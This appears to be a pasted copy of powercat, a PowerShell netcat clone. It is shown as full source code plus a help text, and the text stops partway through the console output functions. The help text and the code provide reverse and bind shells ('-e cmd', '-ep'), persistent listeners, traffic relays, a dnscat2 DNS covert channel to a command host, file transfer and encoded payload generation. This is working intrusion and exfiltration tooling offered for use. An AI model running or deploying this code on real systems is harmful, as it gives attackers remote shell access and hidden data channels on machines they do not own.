powercat the best

1. function powercat
2. {
3.   param(
4.     [alias("Client")][string]$c="",
5.     [alias("Listen")][switch]$l=$False,
6.     [alias("Port")][Parameter(Position=-1)][string]$p="",
7.     [alias("Execute")][string]$e="",
8.     [alias("ExecutePowershell")][switch]$ep=$False,
9.     [alias("Relay")][string]$r="",
10.     [alias("UDP")][switch]$u=$False,
11.     [alias("dnscat2")][string]$dns="",
12.     [alias("DNSFailureThreshold")][int32]$dnsft=10,
13.     [alias("Timeout")][int32]$t=60,
14.     [Parameter(ValueFromPipeline=$True)][alias("Input")]$i=$null,
15.     [ValidateSet('Host', 'Bytes', 'String')][alias("OutputType")][string]$o="Host",
16.     [alias("OutputFile")][string]$of="",
17.     [alias("Disconnect")][switch]$d=$False,
18.     [alias("Repeater")][switch]$rep=$False,
19.     [alias("GeneratePayload")][switch]$g=$False,
20.     [alias("GenerateEncoded")][switch]$ge=$False,
21.     [alias("Help")][switch]$h=$False
22.   )
23.  
24.   ############### HELP ###############
25.   $Help = "
26. powercat - Netcat, The Powershell Version
27. Github Repository: https://github.com/besimorhino/powercat
28.  
29. This script attempts to implement the features of netcat in a powershell
30. script. It also contains extra features such as built-in relays, execute
31. powershell, and a dnscat2 client.
32.  
33. Usage: powercat [-c or -l] [-p port] [options]
34.  
35.  -c  <ip>        Client Mode. Provide the IP of the system you wish to connect to.
36.                  If you are using -dns, specify the DNS Server to send queries to.
37.            
38.  -l              Listen Mode. Start a listener on the port specified by -p.
39.  
40.  -p  <port>      Port. The port to connect to, or the port to listen on.
41.  
42.  -e  <proc>      Execute. Specify the name of the process to start.
43.  
44.  -ep             Execute Powershell. Start a pseudo powershell session. You can
45.                  declare variables and execute commands, but if you try to enter
46.                  another shell (nslookup, netsh, cmd, etc.) the shell will hang.
47.            
48.  -r  <str>       Relay. Used for relaying network traffic between two nodes.
49.                  Client Relay Format:   -r <protocol>:<ip addr>:<port>
50.                  Listener Relay Format: -r <protocol>:<port>
51.                  DNSCat2 Relay Format:  -r dns:<dns server>:<dns port>:<domain>
52.            
53.  -u              UDP Mode. Send traffic over UDP. Because it's UDP, the client
54.                  must send data before the server can respond.
55.            
56.  -dns  <domain>  DNS Mode. Send traffic over the dnscat2 dns covert channel.
57.                  Specify the dns server to -c, the dns port to -p, and specify the
58.                  domain to this option, -dns. This is only a client.
59.                  Get the server here: https://github.com/iagox86/dnscat2
60.            
61.  -dnsft <int>    DNS Failure Threshold. This is how many bad packets the client can
62.                  recieve before exiting. Set to zero when receiving files, and set high
63.                  for more stability over the internet.
64.            
65.  -t  <int>       Timeout. The number of seconds to wait before giving up on listening or
66.                  connecting. Default: 60
67.            
68.  -i  <input>     Input. Provide data to be sent down the pipe as soon as a connection is
69.                  established. Used for moving files. You can provide the path to a file,
70.                  a byte array object, or a string. You can also pipe any of those into
71.                  powercat, like 'aaaaaa' | powercat -c 10.1.1.1 -p 80
72.            
73.  -o  <type>      Output. Specify how powercat should return information to the console.
74.                  Valid options are 'Bytes', 'String', or 'Host'. Default is 'Host'.
75.            
76.  -of <path>      Output File.  Specify the path to a file to write output to.
77.            
78.  -d              Disconnect. powercat will disconnect after the connection is established
79.                  and the input from -i is sent. Used for scanning.
80.            
81.  -rep            Repeater. powercat will continually restart after it is disconnected.
82.                  Used for setting up a persistent server.
83.                  
84.  -g              Generate Payload.  Returns a script as a string which will execute the
85.                  powercat with the options you have specified. -i, -d, and -rep will not
86.                  be incorporated.
87.                  
88.  -ge             Generate Encoded Payload. Does the same as -g, but returns a string which
89.                  can be executed in this way: powershell -E <encoded string>
90.  
91.  -h              Print this help message.
92.  
93. Examples:
94.  
95.  Listen on port 8000 and print the output to the console.
96.      powercat -l -p 8000
97.  
98.  Connect to 10.1.1.1 port 443, send a shell, and enable verbosity.
99.      powercat -c 10.1.1.1 -p 443 -e cmd -v
100.  
101.  Connect to the dnscat2 server on c2.example.com, and send dns queries
102.  to the dns server on 10.1.1.1 port 53.
103.      powercat -c 10.1.1.1 -p 53 -dns c2.example.com
104.  
105.  Send a file to 10.1.1.15 port 8000.
106.      powercat -c 10.1.1.15 -p 8000 -i C:\inputfile
107.  
108.  Write the data sent to the local listener on port 4444 to C:\outfile
109.      powercat -l -p 4444 -of C:\outfile
110.  
111.  Listen on port 8000 and repeatedly server a powershell shell.
112.      powercat -l -p 8000 -ep -rep
113.  
114.  Relay traffic coming in on port 8000 over tcp to port 9000 on 10.1.1.1 over tcp.
115.      powercat -l -p 8000 -r tcp:10.1.1.1:9000
116.      
117.  Relay traffic coming in on port 8000 over tcp to the dnscat2 server on c2.example.com,
118.  sending queries to 10.1.1.1 port 53.
119.      powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
120. "
121.   if($h){return $Help}
122.   ############### HELP ###############
123.  
124.   ############### VALIDATE ARGS ###############
125.   $global:Verbose = $Verbose
126.   if($of -ne ''){$o = 'Bytes'}
127.   if($dns -eq "")
128.   {
129.     if((($c -eq "") -and (!$l)) -or (($c -ne "") -and $l)){return "You must select either client mode (-c) or listen mode (-l)."}
130.     if($p -eq ""){return "Please provide a port number to -p."}
131.   }
132.   if(((($r -ne "") -and ($e -ne "")) -or (($e -ne "") -and ($ep))) -or  (($r -ne "") -and ($ep))){return "You can only pick one of these: -e, -ep, -r"}
133.   if(($i -ne $null) -and (($r -ne "") -or ($e -ne ""))){return "-i is not applicable here."}
134.   if($l)
135.   {
136.     $Failure = $False
137.     netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $p){Write-Output ("The selected port " + $p + " is already in use.") ; $Failure=$True}}
138.     if($Failure){break}
139.   }
140.   if($r -ne "")
141.   {
142.     if($r.split(":").Count -eq 2)
143.     {
144.       $Failure = $False
145.       netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $r.split(":")[1]){Write-Output ("The selected port " + $r.split(":")[1] + " is already in use.") ; $Failure=$True}}
146.       if($Failure){break}
147.     }
148.   }
149.   ############### VALIDATE ARGS ###############
150.  
151.   ############### UDP FUNCTIONS ###############
152.   function Setup_UDP
153.   {
154.     param($FuncSetupVars)
155.     if($global:Verbose){$Verbose = $True}
156.     $c,$l,$p,$t = $FuncSetupVars
157.     $FuncVars = @{}
158.     $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
159.     if($l)
160.     {
161.       $SocketDestinationBuffer = New-Object System.Byte[] 65536
162.       $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any), $p
163.       $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient $p
164.       $PacketInfo = New-Object System.Net.Sockets.IPPacketInformation
165.       Write-Verbose ("Listening on [0.0.0.0] port " + $p + " [udp]")
166.       $ConnectHandle = $FuncVars["Socket"].Client.BeginReceiveMessageFrom($SocketDestinationBuffer,0,65536,[System.Net.Sockets.SocketFlags]::None,[ref]$EndPoint,$null,$null)
167.       $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
168.       while($True)
169.       {
170.         if($Host.UI.RawUI.KeyAvailable)
171.         {
172.           if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown").VirtualKeyCode))
173.           {
174.             Write-Verbose "CTRL or ESC caught. Stopping UDP Setup..."
175.             $FuncVars["Socket"].Close()
176.             $Stopwatch.Stop()
177.             break
178.           }
179.         }
180.         if($Stopwatch.Elapsed.TotalSeconds -gt $t)
181.         {
182.           $FuncVars["Socket"].Close()
183.           $Stopwatch.Stop()
184.           Write-Verbose "Timeout!" ; break
185.         }
186.         if($ConnectHandle.IsCompleted)
187.         {
188.           $SocketBytesRead = $FuncVars["Socket"].Client.EndReceiveMessageFrom($ConnectHandle,[ref]([System.Net.Sockets.SocketFlags]::None),[ref]$EndPoint,[ref]$PacketInfo)
189.           Write-Verbose ("Connection from [" + $EndPoint.Address.IPAddressToString + "] port " + $p + " [udp] accepted (source port " + $EndPoint.Port + ")")
190.           if($SocketBytesRead -gt 0){break}
191.           else{break}
192.         }
193.       }
194.       $Stopwatch.Stop()
195.       $FuncVars["InitialConnectionBytes"] = $SocketDestinationBuffer[0..([int]$SocketBytesRead-1)]
196.     }
197.     else
198.     {
199.       if(!$c.Contains("."))
200.       {
201.         $IPList = @()
202.         [System.Net.Dns]::GetHostAddresses($c) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | %{$IPList += $_.IPAddressToString}
203.         Write-Verbose ("Name " + $c + " resolved to address " + $IPList[0])
204.         $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($IPList[0])), $p
205.       }
206.       else
207.       {
208.         $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($c)), $p
209.       }
210.       $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient
211.       $FuncVars["Socket"].Connect($c,$p)
212.       Write-Verbose ("Sending UDP traffic to " + $c + " port " + $p + "...")
213.       Write-Verbose ("UDP: Make sure to send some data so the server can notice you!")
214.     }
215.     $FuncVars["BufferSize"] = 65536
216.     $FuncVars["EndPoint"] = $EndPoint
217.     $FuncVars["StreamDestinationBuffer"] = New-Object System.Byte[] $FuncVars["BufferSize"]
218.     $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null)
219.     return $FuncVars
220.   }
221.   function ReadData_UDP
222.   {
223.     param($FuncVars)
224.     $Data = $null
225.     if($FuncVars["StreamReadOperation"].IsCompleted)
226.     {
227.       $StreamBytesRead = $FuncVars["Socket"].Client.EndReceiveFrom($FuncVars["StreamReadOperation"],[ref]$FuncVars["EndPoint"])
228.       if($StreamBytesRead -eq 0){break}
229.       $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)]
230.       $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null)
231.     }
232.     return $Data,$FuncVars
233.   }
234.   function WriteData_UDP
235.   {
236.     param($Data,$FuncVars)
237.     $FuncVars["Socket"].Client.SendTo($Data,$FuncVars["EndPoint"]) | Out-Null
238.     return $FuncVars
239.   }
240.   function Close_UDP
241.   {
242.     param($FuncVars)
243.     $FuncVars["Socket"].Close()
244.   }
245.   ############### UDP FUNCTIONS ###############
246.  
247.   ############### DNS FUNCTIONS ###############
248.   function Setup_DNS
249.   {
250.     param($FuncSetupVars)
251.     if($global:Verbose){$Verbose = $True}
252.     function ConvertTo-HexArray
253.     {
254.       param($String)
255.       $Hex = @()
256.       $String.ToCharArray() | % {"{0:x}" -f [byte]$_} | % {if($_.Length -eq 1){"0" + [string]$_} else{[string]$_}} | % {$Hex += $_}
257.       return $Hex
258.     }
259.    
260.     function SendPacket
261.     {
262.       param($Packet,$DNSServer,$DNSPort)
263.       $Command = ("set type=TXT`nserver $DNSServer`nset port=$DNSPort`nset domain=.com`nset retry=1`n" + $Packet + "`nexit")
264.       $result = ($Command | nslookup 2>&1 | Out-String)
265.       if($result.Contains('"')){return ([regex]::Match($result.replace("bio=",""),'(?<=")[^"]*(?=")').Value)}
266.       else{return 1}
267.     }
268.    
269.     function Create_SYN
270.     {
271.       param($SessionId,$SeqNum,$Tag,$Domain)
272.       return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "00" + $SessionId + $SeqNum + "0000" + $Domain)
273.     }
274.    
275.     function Create_FIN
276.     {
277.       param($SessionId,$Tag,$Domain)
278.       return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "02" + $SessionId + "00" + $Domain)
279.     }
280.    
281.     function Create_MSG
282.     {
283.       param($SessionId,$SeqNum,$AcknowledgementNumber,$Data,$Tag,$Domain)
284.       return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "01" + $SessionId + $SeqNum + $AcknowledgementNumber + $Data + $Domain)
285.     }
286.    
287.     function DecodePacket
288.     {
289.       param($Packet)
290.      
291.       if((($Packet.Length)%2 -eq 1) -or ($Packet.Length -eq 0)){return 1}
292.       $AcknowledgementNumber = ($Packet[10..13] -join "")
293.       $SeqNum = ($Packet[14..17] -join "")
294.       [byte[]]$ReturningData = @()
295.      
296.       if($Packet.Length -gt 18)
297.       {
298.         $PacketElim = $Packet.Substring(18)
299.         while($PacketElim.Length -gt 0)
300.         {
301.           $ReturningData += [byte[]][Convert]::ToInt16(($PacketElim[0..1] -join ""),16)
302.           $PacketElim = $PacketElim.Substring(2)
303.         }
304.       }
305.      
306.       return $Packet,$ReturningData,$AcknowledgementNumber,$SeqNum
307.     }
308.    
309.     function AcknowledgeData
310.     {
311.       param($ReturningData,$AcknowledgementNumber)
312.       $Hex = [string]("{0:x}" -f (([uint16]("0x" + $AcknowledgementNumber) + $ReturningData.Length) % 65535))
313.       if($Hex.Length -ne 4){$Hex = (("0"*(4-$Hex.Length)) + $Hex)}
314.       return $Hex
315.     }
316.     $FuncVars = @{}
317.     $FuncVars["DNSServer"],$FuncVars["DNSPort"],$FuncVars["Domain"],$FuncVars["FailureThreshold"] = $FuncSetupVars
318.     if($FuncVars["DNSPort"] -eq ''){$FuncVars["DNSPort"] = "53"}
319.     $FuncVars["Tag"] = ""
320.     $FuncVars["Domain"] = ("." + $FuncVars["Domain"])
321.    
322.     $FuncVars["Create_SYN"] = ${function:Create_SYN}
323.     $FuncVars["Create_MSG"] = ${function:Create_MSG}
324.     $FuncVars["Create_FIN"] = ${function:Create_FIN}
325.     $FuncVars["DecodePacket"] = ${function:DecodePacket}
326.     $FuncVars["ConvertTo-HexArray"] = ${function:ConvertTo-HexArray}
327.     $FuncVars["AckData"] = ${function:AcknowledgeData}
328.     $FuncVars["SendPacket"] = ${function:SendPacket}
329.     $FuncVars["SessionId"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
330.     $FuncVars["SeqNum"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
331.     $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
332.     $FuncVars["Failures"] = 0
333.    
334.     $SYNPacket = (Invoke-Command $FuncVars["Create_SYN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["Tag"],$FuncVars["Domain"]))
335.     $ResponsePacket = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($SYNPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))
336.     $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($ResponsePacket))
337.     if($DecodedPacket -eq 1){return "Bad SYN response. Ensure your server is set up correctly."}
338.     $ReturningData = $DecodedPacket[1]
339.     if($ReturningData -ne ""){$FuncVars["InputData"] = ""}
340.     $FuncVars["AckNum"] = $DecodedPacket[2]
341.     $FuncVars["MaxMSGDataSize"] = (244 - (Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],"",$FuncVars["Tag"],$FuncVars["Domain"])).Length)
342.     if($FuncVars["MaxMSGDataSize"] -le 0){return "Domain name is too long."}
343.     return $FuncVars
344.   }
345.   function ReadData_DNS
346.   {
347.     param($FuncVars)
348.     if($global:Verbose){$Verbose = $True}
349.    
350.     $PacketsData = @()
351.     $PacketData = ""
352.    
353.     if($FuncVars["InputData"] -ne $null)
354.     {
355.       $Hex = (Invoke-Command $FuncVars["ConvertTo-HexArray"] -ArgumentList @($FuncVars["InputData"]))
356.       $SectionCount = 0
357.       $PacketCount = 0
358.       foreach($Char in $Hex)
359.       {
360.         if($SectionCount -ge 30)
361.         {
362.           $SectionCount = 0
363.           $PacketData += "."
364.         }
365.         if($PacketCount -ge ($FuncVars["MaxMSGDataSize"]))
366.         {
367.           $PacketsData += $PacketData.TrimEnd(".")
368.           $PacketCount = 0
369.           $SectionCount = 0
370.           $PacketData = ""
371.         }
372.         $PacketData += $Char
373.         $SectionCount += 2
374.         $PacketCount += 2
375.       }
376.       $PacketData = $PacketData.TrimEnd(".")
377.       $PacketsData += $PacketData
378.       $FuncVars["InputData"] = ""
379.     }
380.     else
381.     {
382.       $PacketsData = @("")
383.     }
384.    
385.     [byte[]]$ReturningData = @()
386.     foreach($PacketData in $PacketsData)
387.     {
388.       try{$MSGPacket = Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],$PacketData,$FuncVars["Tag"],$FuncVars["Domain"])}
389.       catch{ Write-Verbose "DNSCAT2: Failed to create packet." ; $FuncVars["Failures"] += 1 ; continue }
390.       try{$Packet = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($MSGPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))}
391.       catch{ Write-Verbose "DNSCAT2: Failed to send packet." ; $FuncVars["Failures"] += 1 ; continue }
392.       try
393.       {
394.         $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($Packet))
395.         if($DecodedPacket.Length -ne 4){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..."; $FuncVars["Failures"] += 1 ; continue }
396.         $FuncVars["AckNum"] = $DecodedPacket[2]
397.         $FuncVars["SeqNum"] = $DecodedPacket[3]
398.         $ReturningData += $DecodedPacket[1]
399.       }
400.       catch{ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }
401.       if($DecodedPacket -eq 1){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }
402.     }
403.    
404.     if($FuncVars["Failures"] -ge $FuncVars["FailureThreshold"]){break}
405.    
406.     if($ReturningData -ne @())
407.     {
408.       $FuncVars["AckNum"] = (Invoke-Command $FuncVars["AckData"] -ArgumentList @($ReturningData,$FuncVars["AckNum"]))
409.     }
410.     return $ReturningData,$FuncVars
411.   }
412.   function WriteData_DNS
413.   {
414.     param($Data,$FuncVars)
415.     $FuncVars["InputData"] = $FuncVars["Encoding"].GetString($Data)
416.     return $FuncVars
417.   }
418.   function Close_DNS
419.   {
420.     param($FuncVars)
421.     $FINPacket = Invoke-Command $FuncVars["Create_FIN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["Tag"],$FuncVars["Domain"])
422.     Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($FINPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]) | Out-Null
423.   }
424.   ############### DNS FUNCTIONS ###############
425.  
426.   ########## TCP FUNCTIONS ##########
427.   function Setup_TCP
428.   {
429.     param($FuncSetupVars)
430.     $c,$l,$p,$t = $FuncSetupVars
431.     if($global:Verbose){$Verbose = $True}
432.     $FuncVars = @{}
433.     if(!$l)
434.     {
435.       $FuncVars["l"] = $False
436.       $Socket = New-Object System.Net.Sockets.TcpClient
437.       Write-Verbose "Connecting..."
438.       $Handle = $Socket.BeginConnect($c,$p,$null,$null)
439.     }
440.     else
441.     {
442.       $FuncVars["l"] = $True
443.       Write-Verbose ("Listening on [0.0.0.0] (port " + $p + ")")
444.       $Socket = New-Object System.Net.Sockets.TcpListener $p
445.       $Socket.Start()
446.       $Handle = $Socket.BeginAcceptTcpClient($null, $null)
447.     }
448.    
449.     $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
450.     while($True)
451.     {
452.       if($Host.UI.RawUI.KeyAvailable)
453.       {
454.         if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown").VirtualKeyCode))
455.         {
456.           Write-Verbose "CTRL or ESC caught. Stopping TCP Setup..."
457.           if($FuncVars["l"]){$Socket.Stop()}
458.           else{$Socket.Close()}
459.           $Stopwatch.Stop()
460.           break
461.         }
462.       }
463.       if($Stopwatch.Elapsed.TotalSeconds -gt $t)
464.       {
465.         if(!$l){$Socket.Close()}
466.         else{$Socket.Stop()}
467.         $Stopwatch.Stop()
468.         Write-Verbose "Timeout!" ; break
469.         break
470.       }
471.       if($Handle.IsCompleted)
472.       {
473.         if(!$l)
474.         {
475.           try
476.           {
477.             $Socket.EndConnect($Handle)
478.             $Stream = $Socket.GetStream()
479.             $BufferSize = $Socket.ReceiveBufferSize
480.             Write-Verbose ("Connection to " + $c + ":" + $p + " [tcp] succeeded!")
481.           }
482.           catch{$Socket.Close(); $Stopwatch.Stop(); break}
483.         }
484.         else
485.         {
486.           $Client = $Socket.EndAcceptTcpClient($Handle)
487.           $Stream = $Client.GetStream()
488.           $BufferSize = $Client.ReceiveBufferSize
489.           Write-Verbose ("Connection from [" + $Client.Client.RemoteEndPoint.Address.IPAddressToString + "] port " + $port + " [tcp] accepted (source port " + $Client.Client.RemoteEndPoint.Port + ")")
490.         }
491.         break
492.       }
493.     }
494.     $Stopwatch.Stop()
495.     if($Socket -eq $null){break}
496.     $FuncVars["Stream"] = $Stream
497.     $FuncVars["Socket"] = $Socket
498.     $FuncVars["BufferSize"] = $BufferSize
499.     $FuncVars["StreamDestinationBuffer"] = (New-Object System.Byte[] $FuncVars["BufferSize"])
500.     $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null)
501.     $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
502.     $FuncVars["StreamBytesRead"] = 1
503.     return $FuncVars
504.   }
505.   function ReadData_TCP
506.   {
507.     param($FuncVars)
508.     $Data = $null
509.     if($FuncVars["StreamBytesRead"] -eq 0){break}
510.     if($FuncVars["StreamReadOperation"].IsCompleted)
511.     {
512.       $StreamBytesRead = $FuncVars["Stream"].EndRead($FuncVars["StreamReadOperation"])
513.       if($StreamBytesRead -eq 0){break}
514.       $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)]
515.       $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null)
516.     }
517.     return $Data,$FuncVars
518.   }
519.   function WriteData_TCP
520.   {
521.     param($Data,$FuncVars)
522.     $FuncVars["Stream"].Write($Data, 0, $Data.Length)
523.     return $FuncVars
524.   }
525.   function Close_TCP
526.   {
527.     param($FuncVars)
528.     try{$FuncVars["Stream"].Close()}
529.     catch{}
530.     if($FuncVars["l"]){$FuncVars["Socket"].Stop()}
531.     else{$FuncVars["Socket"].Close()}
532.   }
533.   ########## TCP FUNCTIONS ##########
534.  
535.   ########## CMD FUNCTIONS ##########
536.   function Setup_CMD
537.   {
538.     param($FuncSetupVars)
539.     if($global:Verbose){$Verbose = $True}
540.     $FuncVars = @{}
541.     $ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo
542.     $ProcessStartInfo.FileName = $FuncSetupVars[0]
543.     $ProcessStartInfo.UseShellExecute = $False
544.     $ProcessStartInfo.RedirectStandardInput = $True
545.     $ProcessStartInfo.RedirectStandardOutput = $True
546.     $ProcessStartInfo.RedirectStandardError = $True
547.     $FuncVars["Process"] = [System.Diagnostics.Process]::Start($ProcessStartInfo)
548.     Write-Verbose ("Starting Process " + $FuncSetupVars[0] + "...")
549.     $FuncVars["Process"].Start() | Out-Null
550.     $FuncVars["StdOutDestinationBuffer"] = New-Object System.Byte[] 65536
551.     $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null)
552.     $FuncVars["StdErrDestinationBuffer"] = New-Object System.Byte[] 65536
553.     $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null)
554.     $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
555.     return $FuncVars
556.   }
557.   function ReadData_CMD
558.   {
559.     param($FuncVars)
560.     [byte[]]$Data = @()
561.     if($FuncVars["StdOutReadOperation"].IsCompleted)
562.     {
563.       $StdOutBytesRead = $FuncVars["Process"].StandardOutput.BaseStream.EndRead($FuncVars["StdOutReadOperation"])
564.       if($StdOutBytesRead -eq 0){break}
565.       $Data += $FuncVars["StdOutDestinationBuffer"][0..([int]$StdOutBytesRead-1)]
566.       $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null)
567.     }
568.     if($FuncVars["StdErrReadOperation"].IsCompleted)
569.     {
570.       $StdErrBytesRead = $FuncVars["Process"].StandardError.BaseStream.EndRead($FuncVars["StdErrReadOperation"])
571.       if($StdErrBytesRead -eq 0){break}
572.       $Data += $FuncVars["StdErrDestinationBuffer"][0..([int]$StdErrBytesRead-1)]
573.       $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null)
574.     }
575.     return $Data,$FuncVars
576.   }
577.   function WriteData_CMD
578.   {
579.     param($Data,$FuncVars)
580.     $FuncVars["Process"].StandardInput.WriteLine($FuncVars["Encoding"].GetString($Data).TrimEnd("`r").TrimEnd("`n"))
581.     return $FuncVars
582.   }
583.   function Close_CMD
584.   {
585.     param($FuncVars)
586.     $FuncVars["Process"] | Stop-Process
587.   }  
588.   ########## CMD FUNCTIONS ##########
589.  
590.   ########## POWERSHELL FUNCTIONS ##########
591.   function Main_Powershell
592.   {
593.     param($Stream1SetupVars)  
594.     try
595.     {
596.       $encoding = New-Object System.Text.AsciiEncoding
597.       [byte[]]$InputToWrite = @()
598.       if($i -ne $null)
599.       {
600.         Write-Verbose "Input from -i detected..."
601.         if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) }
602.         elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i }
603.         elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) }
604.         else{Write-Host "Unrecognised input type." ; return}
605.       }
606.    
607.       Write-Verbose "Setting up Stream 1... (ESC/CTRL to exit)"
608.       try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
609.       catch{Write-Verbose "Stream 1 Setup Failure" ; return}
610.      
611.       Write-Verbose "Setting up Stream 2... (ESC/CTRL to exit)"
612.       try
613.       {
614.         $IntroPrompt = $Encoding.GetBytes("Windows PowerShell`nCopyright (C) 2013 Microsoft Corporation. All rights reserved.`n`n" + ("PS " + (pwd).Path + "> "))
615.         $Prompt = ("PS " + (pwd).Path + "> ")
616.         $CommandToExecute = ""      
617.         $Data = $null
618.       }
619.       catch
620.       {
621.         Write-Verbose "Stream 2 Setup Failure" ; return
622.       }
623.      
624.       if($InputToWrite -ne @())
625.       {
626.         Write-Verbose "Writing input to Stream 1..."
627.         try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
628.         catch{Write-Host "Failed to write input to Stream 1" ; return}
629.       }
630.      
631.       if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}
632.      
633.       Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
634.       while($True)
635.       {        
636.         try
637.         {
638.           ##### Stream2 Read #####
639.           $Prompt = $null
640.           $ReturnedData = $null
641.           if($CommandToExecute -ne "")
642.           {
643.             try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}
644.             catch{[byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))}
645.             $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> "))
646.           }
647.           $Data += $IntroPrompt
648.           $IntroPrompt = $null
649.           $Data += $ReturnedData
650.           $Data += $Prompt
651.           $CommandToExecute = ""
652.           ##### Stream2 Read #####
653.  
654.           if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
655.           $Data = $null
656.         }
657.         catch
658.         {
659.           Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return
660.         }
661.        
662.         try
663.         {
664.           $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
665.           if($Data.Length -eq 0){Start-Sleep -Milliseconds 100}
666.           if($Data -ne $null){$CommandToExecute = $Encoding.GetString($Data)}
667.           $Data = $null
668.         }
669.         catch
670.         {
671.           Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
672.         }
673.       }
674.     }
675.     finally
676.     {
677.       try
678.       {
679.         Write-Verbose "Closing Stream 1..."
680.         Stream1_Close $Stream1Vars
681.       }
682.       catch
683.       {
684.         Write-Verbose "Failed to close Stream 1"
685.       }
686.     }
687.   }
688.   ########## POWERSHELL FUNCTIONS ##########
689.  
690.   ########## CONSOLE FUNCTIONS ##########
691.   function Setup_Console
692.   {
693.     param($FuncSetupVars)
694.     $FuncVars = @{}
695.     $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
696.     $FuncVars["Output"] = $FuncSetupVars[0]
697.     $FuncVars["OutputBytes"] = [byte[]]@()
698.     $FuncVars["OutputString"] = ""
699.     return $FuncVars
700.   }
701.   function ReadData_Console
702.   {
703.     param($FuncVars)
704.     $Data = $null
705.     if($Host.UI.RawUI.KeyAvailable)
706.     {
707.       $Data = $FuncVars["Encoding"].GetBytes((Read-Host) + "`n")
708.     }
709.     return $Data,$FuncVars
710.   }
711.   function WriteData_Console
712.   {
713.     param($Data,$FuncVars)
714.     switch($FuncVars["Output"])
715.     {
716.       "Host" {Write-Host -n $FuncVars["Encoding"].GetString($Data)}
717.       "String" {$FuncVars["OutputString"] += $FuncVars["Encoding"].GetString($Data)}
